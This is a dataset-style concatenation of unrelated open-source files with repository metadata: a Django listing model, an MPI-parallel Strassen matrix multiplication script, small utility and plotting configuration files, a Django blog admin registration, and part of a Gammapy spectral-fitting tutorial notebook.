title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
e8e305a6f11009f9aa86ad3315641ca93bac6171
|
59b1dc370837138dfd1820516e65c3dfbeff85f4
|
/src/Python/parallel_matrix.py
|
29ad5dd9959be0fc35e8d2b663ef7b98ab60d79e
|
[
"MIT"
] |
permissive
|
pargue/matmatmult
|
bc8fcbf0f11e434b8ad641968f2c0925010f26ca
|
32bf1f0eddc7ad11d9403e48caf4bcb99200f703
|
refs/heads/master
| 2020-12-24T08:00:03.339663 | 2016-12-14T17:36:57 | 2016-12-14T17:36:57 | 73,347,236 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,446 |
py
|
#!/usr/bin/env python3
"""
AUTHOR: Cody Kankel
PROG: Parallel_matrix.py
DESC: This is a Python 3 script, requiring mpi4py, that implements
Strassen's Algorithm for multiplying 2 matrices in parallel. This script
will take in a matrix from the cmd line stored as a csv file, and multiply
the matrix by itself by reading in the matrix twice into two separate
variables. This script can only use 7 nodes efficiently as there are 7 clearly
defined operations in Strassen's Algorithm which are ideally run in this script
on separate nodes. Ex:
mpirun -np 7 parallel_matrix.py csv/5192_5192.csv
The numpy module is used to calculate the dot product of the separate portions
of the matrix, as it uses portions of BLAS (Basic Linear Algebra Subroutines).
If IU's systems have numpy compilied which allows this feature, numpy will
take advantage of mutlicore machines and run in parallel utilizing the different
cores available.
"""
import numpy, sys, csv, math
from mpi4py import MPI
# MPI calls necessary for all ranks
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
def main():
"""Main will read and initialize 2 matrices, print them,
generate the correct dot product of them, and send them off to the
    strassen function to be calculated there. It is up to the user of this
program as of right now to verify the strassen method is working."""
if len(sys.argv) != 2:
sys.exit(2)
if rank == 0:
matrix_A = get_matrix(str(sys.argv[1]))
matrix_B = get_matrix(str(sys.argv[1]))
if matrix_A.shape != matrix_B.shape:
print('Error: Matrix A and Matrix B are not the same size Matrix.')
sys.exit()
a_subSize = int(get_dim(matrix_A)/2)
b_subSize = int(get_dim(matrix_B)/2)
if a_subSize != b_subSize:
print("error")
sys.exit()
a_subSize = comm.bcast(a_subSize, root=0)
startTime = MPI.Wtime()
else:
        # Dummy vars so the other ranks can enter the strassen function
a_subSize = None
a_subSize = comm.bcast(a_subSize, root=0)
matrix_A = numpy.empty([2,2])
matrix_B = numpy.empty([2,2])
matrix_C = strassen(matrix_A, matrix_B, a_subSize)
if rank == 0:
runTime = MPI.Wtime() - startTime
#print("Matrix C, after strassen is:")
#print(matrix_C)
print("The time to calculate strassen function in parallel is:\n", runTime)
sys.exit()
def get_matrix(fileName):
"""Function to open a specified file and read the contents using numpy's loadtxt call.
Function will return a numpy matrix (formatted). 'fileName' argument MUST be a string"""
with open(fileName, 'r') as file_ob:
reader = csv.reader(file_ob)
temp_list = list(reader)
temp_list = temp_list[0]
temp_list = list(map(int, temp_list))
matr_len = len(temp_list)
new_shape = int(math.sqrt(matr_len))
matrix = numpy.asarray(temp_list)
matrix = matrix.reshape(new_shape, new_shape)
return matrix
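# --- Added illustration (not part of the original script) -------------------
# A minimal, hedged sketch of how an input CSV for this script could be
# produced, assuming only the layout that get_matrix() above expects: a single
# CSV row holding the n*n integer entries of an n x n matrix. The file name
# and matrix size below are arbitrary examples.
def write_test_matrix(file_name, n=8):
    """Write a random n x n integer matrix as one flattened CSV row."""
    test_matrix = numpy.random.randint(0, 10, size=(n, n))
    with open(file_name, 'w', newline='') as file_ob:
        writer = csv.writer(file_ob)
        writer.writerow(test_matrix.flatten().tolist())
# Example usage (commented out so the module's behaviour is unchanged):
# write_test_matrix('csv/8_8.csv', n=8)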
def strassen(A, B, subSize):
"""Function to perform the strassen algorithm on 2 numpy matricies specified as
A and B. The function will return the dot product of these two matricies
as a numpy.array matrix."""
if rank == 0:
startTime = MPI.Wtime()
# Rank 0 is the master, so it will prepare everything to be parallelized
a_11 = A[0:subSize, 0:subSize]
a_11 = numpy.ascontiguousarray(a_11)
a_12 = A[0:subSize, subSize:]
a_12 = numpy.ascontiguousarray(a_12)
a_21 = A[subSize:, 0:subSize]
a_21 = numpy.ascontiguousarray(a_21)
a_22 = A[subSize:, subSize:]
a_22 = numpy.ascontiguousarray(a_22)
b_11 = B[0:subSize, 0:subSize]
b_11 = numpy.ascontiguousarray(b_11)
b_12 = B[0:subSize, subSize:]
b_12 = numpy.ascontiguousarray(b_12)
b_21 = B[subSize:, 0:subSize]
b_21 = numpy.ascontiguousarray(b_21)
b_22 = B[subSize:, subSize:]
b_22 = numpy.ascontiguousarray(b_22)
# Setting up rank 1 for calculating m2
comm.Send(a_21, dest=1, tag=11)
comm.Send(a_22, dest=1, tag=12)
comm.Send(b_11, dest=1, tag=13)
# Setting up rank 2 for calculating m1
comm.Send(a_11, dest=2, tag=14)
comm.Send(a_22, dest=2, tag=15)
comm.Send(b_22, dest=2, tag=16)
comm.Send(b_11, dest=2, tag=17)
# Setting up rank 3 for calculating m4
comm.Send(a_22, dest=3, tag=18)
comm.Send(b_11, dest=3, tag=19)
comm.Send(b_21, dest=3, tag=20)
# Setting up rank 4 for calculating m5
comm.Send(a_11, dest=4, tag=21)
comm.Send(a_12, dest=4, tag=22)
comm.Send(b_22, dest=4, tag=23)
# Setting up rank 5 for calculating m6
comm.Send(a_11, dest=5, tag=24)
comm.Send(a_21, dest=5, tag=25)
comm.Send(b_11, dest=5, tag=26)
comm.Send(b_12, dest=5, tag=27)
# Setting up rank 6 for calculating m7
comm.Send(a_12, dest=6, tag=28)
comm.Send(a_22, dest=6, tag=29)
comm.Send(b_21, dest=6, tag=30)
comm.Send(b_22, dest=6, tag=31)
# rank 0 will now calculate m3
m3 = a_11.dot(b_12 - b_22)
# rank 0 will send m3 to rank 5 to calculate c22
comm.Send(m3, dest=5, tag=32)
# rank 0 will receive m5 from 4 for C12
m5 = numpy.arange((subSize * subSize))
comm.Recv(m5, source=4, tag=36)
m5 = m5.reshape(subSize, subSize)
# rank 0 will now calculate C12
C12 = m3 + m5
#receiving the rest of C from the other ranks
C11 = numpy.arange((subSize * subSize))
comm.Recv(C11, source=2, tag=42)
C21 = numpy.arange((subSize * subSize))
comm.Recv(C21, source=3, tag=40)
C22 = numpy.arange((subSize * subSize))
comm.Recv(C22, source=5, tag=41)
C11 = C11.reshape(subSize, subSize)
C21 = C21.reshape(subSize, subSize)
C22 = C22.reshape(subSize, subSize)
        # assemble the full product matrix C from its four blocks
C = numpy.bmat([[C11, C12], [C21, C22]])
return C
if rank == 1:
a_21 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
comm.Recv(a_21, source=0, tag=11)
comm.Recv(a_22, source=0, tag=12)
comm.Recv(b_11, source=0, tag=13)
a_21 = a_21.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
# using numpy's matrix multiplier to calculate m2
m2 = ((a_21 + a_22).dot(b_11))
m2 = numpy.ascontiguousarray(m2)
# sending m2 other ranks to calculate portions of matrix C
comm.Send(m2, dest=5, tag=34)
comm.Send(m2, dest=3, tag=35)
return None
if rank == 2:
a_11 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=14)
comm.Recv(a_22, source=0, tag=15)
comm.Recv(b_11, source=0, tag=16)
comm.Recv(b_22, source=0, tag=17)
a_11 = a_11.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
# using numpy's matrix multiplier to calculate m1
m1 = (a_11 + a_22).dot((b_11 + b_22))
m1 = numpy.ascontiguousarray(m1)
        # sending m1 to rank 5 to calculate portions of product matrix C
comm.Send(m1, dest=5, tag=33)
m4 = numpy.arange((subSize * subSize))
comm.Recv(m4, source=3, tag=36)
m5 = numpy.arange((subSize * subSize))
comm.Recv(m5, source=4, tag=38)
m7 = numpy.arange((subSize * subSize))
comm.Recv(m7, source=6, tag=39)
m4 = m4.reshape(subSize, subSize)
m5 = m5.reshape(subSize, subSize)
m7 = m7.reshape(subSize, subSize)
#calculating C11
C11 = m1 + m4 - m5 + m7
C11 = numpy.ascontiguousarray(C11)
comm.Send(C11, dest=0, tag=42)
return None
if rank == 3:
a_22 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_21 = numpy.arange((subSize * subSize))
comm.Recv(a_22, source=0, tag=18)
comm.Recv(b_11, source=0, tag=19)
comm.Recv(b_21, source=0, tag=20)
a_22 = a_22.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_21 = b_21.reshape(subSize, subSize)
# Using numpy's matrix multiplier to calculate m4
m4 = a_22.dot(b_21 - b_11)
m4 = numpy.ascontiguousarray(m4)
# Sending m4 to rank 2
comm.Send(m4, dest=2, tag=36)
#receiving 2 from rank 1
m2 = numpy.arange((subSize * subSize))
comm.Recv(m2, source=1, tag=35)
m2 = m2.reshape(subSize, subSize)
C21 = m2 + m4
C21 = numpy.ascontiguousarray(C21)
comm.Send(C21, dest=0, tag=40)
return None
if rank == 4:
a_11 = numpy.arange((subSize * subSize))
a_12 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=21)
comm.Recv(a_12, source=0, tag=22)
comm.Recv(b_22, source=0, tag=23)
a_11 = a_11.reshape(subSize, subSize)
a_12 = a_12.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
m5 = (a_11 + a_12).dot(b_22)
m5 = numpy.ascontiguousarray(m5)
# Sending m5 to ranks to calculate portions of C
comm.Send(m5, dest=0, tag=36)
comm.Send(m5, dest=2, tag=38)
return None
if rank == 5:
a_11 = numpy.arange((subSize * subSize))
a_21 = numpy.arange((subSize * subSize))
b_11 = numpy.arange((subSize * subSize))
b_12 = numpy.arange((subSize * subSize))
comm.Recv(a_11, source=0, tag=24)
comm.Recv(a_21, source=0, tag=25)
comm.Recv(b_11, source=0, tag=26)
comm.Recv(b_12, source=0, tag=27)
a_11 = a_11.reshape(subSize, subSize)
a_21 = a_21.reshape(subSize, subSize)
b_11 = b_11.reshape(subSize, subSize)
b_12 = b_12.reshape(subSize, subSize)
m6 = (a_21 - a_11).dot(b_11 + b_12)
# receiving m3, m1, m2 to calculate c22
m3 = numpy.arange((subSize * subSize))
comm.Recv(m3, source=0, tag=32)
m1 = numpy.arange((subSize * subSize))
comm.Recv(m1, source=2 , tag=33)
m2 = numpy.arange((subSize * subSize))
comm.Recv(m2, source=1, tag=34)
m3 = m3.reshape(subSize, subSize)
m1 = m1.reshape(subSize, subSize)
m2 = m2.reshape(subSize, subSize)
#calculate C22
C22 = m1 -m2 + m3 + m6
C22 = numpy.ascontiguousarray(C22)
comm.Send(C22, dest=0, tag=41)
return None
if rank == 6:
a_12 = numpy.arange((subSize * subSize))
a_22 = numpy.arange((subSize * subSize))
b_21 = numpy.arange((subSize * subSize))
b_22 = numpy.arange((subSize * subSize))
comm.Recv(a_12, source=0, tag=28)
comm.Recv(a_22, source=0, tag=29)
comm.Recv(b_21, source=0, tag=30)
comm.Recv(b_22, source=0, tag=31)
a_12 = a_12.reshape(subSize, subSize)
a_22 = a_22.reshape(subSize, subSize)
b_21 = b_21.reshape(subSize, subSize)
b_22 = b_22.reshape(subSize, subSize)
m7 = (a_12 - a_22).dot((b_21 + b_22))
m7 = numpy.ascontiguousarray(m7)
comm.Send(m7, dest=2, tag=39)
return None
def get_dim(matrix):
"""Function to get the dim of a matrix and return. Assumes the matricies are
already square. Returns an integer for the dim of the matrix"""
return int((str(matrix.shape).split(',')[0].replace('(','')))
# Standard boilerplate to call the main() function.
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
a037aadb28a082e3c64b0d78e14d175f29d0182b
|
779515ef9cb52d13c8f6c46623ec8906ac658452
|
/utils/emoji.py
|
436a96bd1585e415b52958284aaacfef43cc33c8
|
[
"MIT"
] |
permissive
|
Chrrapek/DiscordMiejski
|
ca014b81f4d41efe7cc9ac28913da9b29afc64e0
|
fd59433c1315baadd91a9ef29ca534924bcdc7f4
|
refs/heads/master
| 2023-04-14T20:59:44.765418 | 2021-04-12T19:18:53 | 2021-04-12T19:18:53 | 303,675,183 | 3 | 2 |
MIT
| 2021-04-12T19:18:54 | 2020-10-13T11:05:09 |
Python
|
UTF-8
|
Python
| false | false | 65 |
py
|
PEPE_SAD = 775061981496606740
PEPE_NAWROCKI = 775059704795758602
|
[
"[email protected]"
] | |
fcaf5d0a55c1039dcaa09d5b5481a8e32e5b4f85
|
52d77c903a5f00fd55985394cd17ee380aaf3ccf
|
/script/Utils.py
|
bdba0a8a74c2251dc082020e61e7724bc1dae669
|
[] |
no_license
|
alexanderflorean/BSc-JavSoCoClassifier
|
7b60ac5df6860c2ec1d7a47fddfba3f14b105b84
|
a6fe7a6fec06beca9f2940cf9c2cdd08bbdaab1a
|
refs/heads/main
| 2023-04-26T06:09:04.250918 | 2021-06-08T13:04:33 | 2021-06-08T13:04:33 | 349,335,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,936 |
py
|
import yaml
# Require a minimum of 5 available test files, regardless of training size.
MIN_NUM_OF_TEST_FILES = 5
def remove_label_column_from_dataframe(dataFrame, label):
return dataFrame[dataFrame["Label"].isin(label) == False].reset_index(drop=True)
def remove_concerns_under_quantity_threshold(dataFrame, minNumOfFiles=5):
labels = dataFrame.Label.unique()
x_quantity = [len(dataFrame.loc[dataFrame["Label"] == label]) for label in labels]
to_be_removed_labels = []
for pos in range(len(labels)):
if x_quantity[pos] < minNumOfFiles + MIN_NUM_OF_TEST_FILES:
to_be_removed_labels.append(labels[pos])
return remove_label_column_from_dataframe(dataFrame, to_be_removed_labels)
def read_yaml_file(path_to_yaml: str):
try:
with open(path_to_yaml, "r") as file:
config = yaml.safe_load(file)
return config
except Exception as e:
print(e + ": Error reading the yaml file: " + path_to_yaml)
def make_dataframe_row(metrics, setting: list, feature_rep: str, setting_id: str) -> dict:
report = metrics.get_classification_report()
quantity_table = metrics.quantity_table()
row = {
"classifier": metrics.name,
"setting_id": setting_id,
"Feature rep.": feature_rep,
"settings": setting,
"accuracy": report["accuracy"],
"macro_precision": report["macro avg"]["precision"],
"macro_recall": report["macro avg"]["recall"],
"weighted_precision": report["weighted avg"]["precision"],
"weighted_recall": report["weighted avg"]["recall"],
"macro_f1": report["macro avg"]["f1-score"],
"weighted_f1": report["weighted avg"]["f1-score"],
"train_size": quantity_table["Train"].sum(),
"test_size": quantity_table["Test"].sum(),
"report_table": metrics.total_report_table(),
}
return row
|
[
"[email protected]"
] | |
7cb0f559cf1a4f0d1a677006477fa65e55752236
|
b1e9991736e1fe83d3886dcb5c860dc94a31af2b
|
/matplotlibrc.py
|
dbebae19a11784998b797d88525705478349e408
|
[] |
no_license
|
bbw7561135/TurbulentDynamo
|
e98748171aff47cf3ec75db3b98e0b2c8dbdf280
|
cba1e7a06ea9434ff3d8d3f9e8482677b0274c2f
|
refs/heads/master
| 2022-12-25T03:37:12.973978 | 2020-08-31T01:11:24 | 2020-08-31T01:11:24 | 294,576,179 | 2 | 1 | null | 2020-09-11T02:42:17 | 2020-09-11T02:42:16 | null |
UTF-8
|
Python
| false | false | 1,166 |
py
|
from matplotlib import rcParams
# rcParams.keys()
rcParams['text.usetex'] = True
rcParams['text.latex.preamble'] = r'\usepackage{bm}'
rcParams['lines.linewidth'] = 1.2
rcParams['font.family'] = 'Arial'
rcParams['font.size'] = 15
rcParams['axes.linewidth'] = 0.8
rcParams['xtick.top'] = True
rcParams['xtick.direction'] = 'in'
rcParams['xtick.minor.visible'] = True
rcParams['xtick.major.size'] = 6
rcParams['xtick.minor.size'] = 3
rcParams['xtick.major.width'] = 0.75
rcParams['xtick.minor.width'] = 0.75
rcParams['xtick.major.pad'] = 5
rcParams['xtick.minor.pad'] = 5
rcParams['ytick.right'] = True
rcParams['ytick.direction'] = 'in'
rcParams['ytick.minor.visible'] = True
rcParams['ytick.major.size'] = 6
rcParams['ytick.minor.size'] = 3
rcParams['ytick.major.width'] = 0.75
rcParams['ytick.minor.width'] = 0.75
rcParams['ytick.major.pad'] = 5
rcParams['ytick.minor.pad'] = 5
rcParams['legend.fontsize'] = 15
rcParams['legend.labelspacing'] = 0.2
rcParams['legend.loc'] = 'upper left'
rcParams['legend.frameon'] = False
rcParams['figure.figsize'] = (8.0, 5.0)
rcParams['figure.dpi'] = 200
rcParams['savefig.dpi'] = 200
rcParams['savefig.bbox'] = 'tight'
|
[
"[email protected]"
] | |
77d1a721f114372350581d34c782000e12e28616
|
3806175fcbc4a386bea986dfb97a362fb983862f
|
/blog/admin.py
|
b067606aa8033d6bc2cc3041330821fe31e22b76
|
[] |
no_license
|
Kiki-demo/MyBlog
|
c53cbcbae1b3280da74d1d349ff6cc717a79b332
|
51554c92ac5435a7bc2222deedf7aa397c0bd73a
|
refs/heads/master
| 2023-03-28T06:08:10.164174 | 2019-08-02T10:25:20 | 2019-08-02T10:25:20 | 199,954,653 | 0 | 0 | null | 2021-03-29T20:10:39 | 2019-08-01T01:34:14 |
CSS
|
GB18030
|
Python
| false | false | 441 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# Register your models here.
from .models import Category, Tag, Post
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
# Also register the newly added PostAdmin
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"[email protected]"
] | |
a4d250d72f94be4c124927e70b0c139ad9f85f9d
|
f8fbf0b0cc919d7d4d7c79532cc5434552d75eb8
|
/docs/0.18.1/_static/notebooks/modeling.py
|
a5bdb272476813045d22aca2f06eddfb47942841
|
[] |
no_license
|
adonath/gammapy-docs
|
ae8571c6aa76d231ac54c93fb3c8968f9f79993b
|
32b605d623abdcd2e82c30bcbf07ef30d259783a
|
refs/heads/main
| 2023-02-25T05:24:53.211005 | 2022-10-13T00:09:12 | 2022-10-13T00:11:33 | 550,476,516 | 0 | 0 | null | 2022-10-12T20:45:50 | 2022-10-12T20:45:49 | null |
UTF-8
|
Python
| false | false | 14,807 |
py
|
#!/usr/bin/env python
# coding: utf-8
# # Modeling and fitting
#
#
# ## Prerequisites
#
# - Knowledge of spectral analysis to produce 1D On-Off datasets, [see the following tutorial](spectrum_analysis.ipynb)
# - Reading of pre-computed datasets [see the MWL tutorial](analysis_mwl.ipynb)
# - General knowledge on statistics and optimization methods
#
# ## Proposed approach
#
# This is a hands-on tutorial to `~gammapy.modeling`, showing how the model, dataset and fit classes work together. As an example we are going to work with HESS data of the Crab Nebula and show in particular how to :
# - perform a spectral analysis
# - use different fitting backends
# - access covariance matrix information and parameter errors
# - compute likelihood profile
# - compute confidence contours
#
# See also: [Models gallery tutorial](models.ipynb) and `docs/modeling/index.rst`.
#
#
# ## The setup
# In[ ]:
import numpy as np
from astropy import units as u
import matplotlib.pyplot as plt
import scipy.stats as st
from gammapy.modeling import Fit
from gammapy.datasets import Datasets, SpectrumDatasetOnOff
from gammapy.modeling.models import LogParabolaSpectralModel, SkyModel
from gammapy.visualization.utils import plot_contour_line
from itertools import combinations
# ## Model and dataset
#
# First we define the source model, here we need only a spectral model for which we choose a log-parabola
# In[ ]:
crab_spectrum = LogParabolaSpectralModel(
amplitude=1e-11 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
alpha=2.3,
beta=0.2,
)
crab_spectrum.alpha.max = 3
crab_spectrum.alpha.min = 1
crab_model = SkyModel(spectral_model=crab_spectrum, name="crab")
# The data and background are read from pre-computed ON/OFF datasets of HESS observations, for simplicity we stack them together.
# Then we set the model and fit range to the resulting dataset.
# In[ ]:
datasets = []
for obs_id in [23523, 23526]:
dataset = SpectrumDatasetOnOff.from_ogip_files(
f"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{obs_id}.fits"
)
datasets.append(dataset)
dataset_hess = Datasets(datasets).stack_reduce(name="HESS")
# Set model and fit range
dataset_hess.models = crab_model
e_min = 0.66 * u.TeV
e_max = 30 * u.TeV
dataset_hess.mask_fit = dataset_hess.counts.geom.energy_mask(e_min, e_max)
# ## Fitting options
#
#
#
# First let's create a `Fit` instance:
# In[ ]:
fit = Fit([dataset_hess], store_trace=True)
# By default the fit is performed using MINUIT; you can select alternative optimizers and set their options using the `optimize_opts` argument of the `Fit.run()` method. In addition, we have specified that the trace of parameter values should be stored during the fit.
#
# Note that, for now, the covariance matrix and errors are computed only when fitting with MINUIT. However, depending on the problem, other optimizers can perform better, so it can sometimes be useful to run a pre-fit with alternative optimization methods.
#
# For the "scipy" backend the available options are desribed in detail here:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'scipy_opts = {"method": "L-BFGS-B", "options": {"ftol": 1e-4, "gtol": 1e-05}}\nresult_scipy = fit.run(backend="scipy", optimize_opts=scipy_opts)')
# For the "sherpa" backend you can choose the optimization algorithm between method = {"simplex", "levmar", "moncar", "gridsearch"}.
# Those methods are described and compared in detail on http://cxc.cfa.harvard.edu/sherpa/methods/index.html.
# The available options of the optimization methods are described on the following page https://cxc.cfa.harvard.edu/sherpa/methods/opt_methods.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sherpa_opts = {"method": "simplex", "ftol": 1e-3, "maxfev": int(1e4)}\nresults_simplex = fit.run(backend="sherpa", optimize_opts=sherpa_opts)')
# For the "minuit" backend see https://iminuit.readthedocs.io/en/latest/reference.html for a detailed description of the available options. If there is an entry ‘migrad_opts’, those options will be passed to [iminuit.Minuit.migrad](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.migrad). Additionnaly you can set the fit tolerance using the [tol](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.tol
# ) option. The minimization will stop when the estimated distance to the minimum is less than 0.001*tol (by default tol=0.1). The [strategy](https://iminuit.readthedocs.io/en/latest/reference.html#iminuit.Minuit.strategy) option change the speed and accuracy of the optimizer: 0 fast, 1 default, 2 slow but accurate. If you want more reliable error estimates, you should run the final fit with strategy 2.
#
# In[ ]:
get_ipython().run_cell_magic('time', '', 'minuit_opts = {"tol": 0.001, "strategy": 1}\nresult_minuit = fit.run(backend="minuit", optimize_opts=minuit_opts)')
# ## Fit quality assessment
#
# There are various ways to check the convergence and quality of a fit. Among them:
#
# - Refer to the automatically-generated results dictionary
# In[ ]:
print(result_scipy)
# In[ ]:
print(results_simplex)
# In[ ]:
print(result_minuit)
# - Check the trace of the fit e.g. in case the fit did not converge properly
# In[ ]:
result_minuit.trace
# - Check that the fitted values and errors for all parameters are reasonable, and no fitted parameter value is "too close" - or even outside - its allowed min-max range
# In[ ]:
result_minuit.parameters.to_table()
# - Plot fit statistic profiles for all fitted parameters, using `~gammapy.modeling.Fit.stat_profile()`. For a good fit and error estimate, each profile should be parabolic
# In[ ]:
total_stat = result_minuit.total_stat
for par in dataset_hess.models.parameters:
if par.frozen is False:
profile = fit.stat_profile(parameter=par)
plt.plot(
profile[f"{par.name}_scan"], profile["stat_scan"] - total_stat
)
plt.xlabel(f"{par.unit}")
plt.ylabel("Delta TS")
plt.title(f"{par.name}: {par.value} +- {par.error}")
plt.show()
plt.close()
# - Inspect model residuals. Those can always be accessed using `~Dataset.residuals()`, which will return an array in case the fitted `Dataset` is a `SpectrumDataset` and a full cube in case of a `MapDataset`. For more details, we refer here to the dedicated fitting tutorials: [analysis_3d.ipynb](analysis_3d.ipynb) (for `MapDataset` fitting) and [spectrum_analysis.ipynb](spectrum_analysis.ipynb) (for `SpectrumDataset` fitting).
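# As a brief added aside (not part of the original notebook), the residuals
# mentioned above can be obtained directly from the stacked dataset. Only the
# bare `residuals()` call referenced in the text is assumed here; plotting
# helpers may also be available depending on the dataset type.

# In[ ]:

residuals = dataset_hess.residuals()
print(residuals)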
# ## Covariance and parameters errors
#
# After the fit the covariance matrix is attached to the model. You can get the error on a specific parameter by accessing the `.error` attribute:
# In[ ]:
crab_model.spectral_model.alpha.error
# As an example, this step is needed to produce a butterfly plot showing the envelope of the model taking into account parameter uncertainties.
# In[ ]:
energy_range = [1, 10] * u.TeV
crab_spectrum.plot(energy_range=energy_range, energy_power=2)
ax = crab_spectrum.plot_error(energy_range=energy_range, energy_power=2)
# ## Confidence contours
#
#
# In most studies, one wishes to estimate parameters distribution using observed sample data.
# A 1-dimensional confidence interval gives an estimated range of values which is likely to include an unknown parameter.
# A confidence contour is a 2-dimensional generalization of a confidence interval, often represented as an ellipsoid around the best-fit value.
#
# Gammapy offers two ways of computing confidence contours, in the dedicated methods `Fit.minos_contour()` and `Fit.stat_surface()`. In the following sections we will describe them.
# An important point to keep in mind is: *what does a $N\sigma$ confidence contour really mean?* The answer is it represents the points of the parameter space for which the model likelihood is $N\sigma$ above the minimum. But one always has to keep in mind that **1 standard deviation in two dimensions has a smaller coverage probability than 68%**, and similarly for all other levels. In particular, in 2-dimensions the probability enclosed by the $N\sigma$ confidence contour is $P(N)=1-e^{-N^2/2}$.
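# As a quick numerical check of the statement above (an added illustration,
# not part of the original notebook), the probability enclosed by an
# $N\sigma$ contour in two dimensions can be evaluated directly:

# In[ ]:

for n_sigma in [1, 2, 3]:
    coverage = 1 - np.exp(-n_sigma ** 2 / 2)
    print(f"{n_sigma} sigma contour in 2D encloses {coverage:.1%} of the probability")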
# ### Computing contours using `Fit.minos_contour()`
# After the fit, MINUIT offers the possibility to compute the confidence contours.
# gammapy provides an interface to this functionality through the `Fit` object using the `minos_contour` method.
# Here we define a function to automate the contour production for the different parameters and confidence levels (expressed in terms of sigma):
# In[ ]:
def make_contours(fit, result, npoints, sigmas):
cts_sigma = []
for sigma in sigmas:
contours = dict()
for par_1, par_2 in combinations(["alpha", "beta", "amplitude"], r=2):
contour = fit.minos_contour(
result.parameters[par_1],
result.parameters[par_2],
numpoints=npoints,
sigma=sigma,
)
contours[f"contour_{par_1}_{par_2}"] = {
par_1: contour[par_1].tolist(),
par_2: contour[par_2].tolist(),
}
cts_sigma.append(contours)
return cts_sigma
# Now we can compute a few contours.
# In[ ]:
get_ipython().run_cell_magic('time', '', 'sigma = [1, 2]\ncts_sigma = make_contours(fit, result_minuit, 10, sigma)')
# Then we prepare some aliases and annotations in order to make the plotting nicer.
# In[ ]:
pars = {
"phi": r"$\phi_0 \,/\,(10^{-11}\,{\rm TeV}^{-1} \, {\rm cm}^{-2} {\rm s}^{-1})$",
"alpha": r"$\alpha$",
"beta": r"$\beta$",
}
panels = [
{
"x": "alpha",
"y": "phi",
"cx": (lambda ct: ct["contour_alpha_amplitude"]["alpha"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_alpha_amplitude"]["amplitude"]
),
},
{
"x": "beta",
"y": "phi",
"cx": (lambda ct: ct["contour_beta_amplitude"]["beta"]),
"cy": (
lambda ct: np.array(1e11)
* ct["contour_beta_amplitude"]["amplitude"]
),
},
{
"x": "alpha",
"y": "beta",
"cx": (lambda ct: ct["contour_alpha_beta"]["alpha"]),
"cy": (lambda ct: ct["contour_alpha_beta"]["beta"]),
},
]
# Finally we produce the confidence contours figures.
# In[ ]:
fig, axes = plt.subplots(1, 3, figsize=(16, 5))
colors = ["m", "b", "c"]
for p, ax in zip(panels, axes):
xlabel = pars[p["x"]]
ylabel = pars[p["y"]]
for ks in range(len(cts_sigma)):
plot_contour_line(
ax,
p["cx"](cts_sigma[ks]),
p["cy"](cts_sigma[ks]),
lw=2.5,
color=colors[ks],
label=f"{sigma[ks]}" + r"$\sigma$",
)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.legend()
plt.tight_layout()
# ### Computing contours using `Fit.stat_surface()`
# This alternative method for the computation of confidence contours, although more time consuming than `Fit.minos_contour()`, is expected to be more stable. It consists of a generalization of `Fit.stat_profile()` to a 2-dimensional parameter space. The algorithm is very simple:
# - First, passing two arrays of parameters values, a 2-dimensional discrete parameter space is defined;
# - For each node of the parameter space, the two parameters of interest are frozen. This way, a likelihood value ($-2\mathrm{ln}\,\mathcal{L}$, actually) is computed, by either freezing (default) or fitting all nuisance parameters;
# - Finally, a 2-dimensional surface of $-2\mathrm{ln}(\mathcal{L})$ values is returned.
# Using that surface, one can easily compute a surface of $TS = -2\Delta\mathrm{ln}(\mathcal{L})$ and compute confidence contours.
#
# Let's see it step by step.
# First of all, we can notice that this method is "backend-agnostic", meaning that it can be run with MINUIT, sherpa or scipy as fitting tools. Here we will stick with MINUIT, which is the default choice:
# In[ ]:
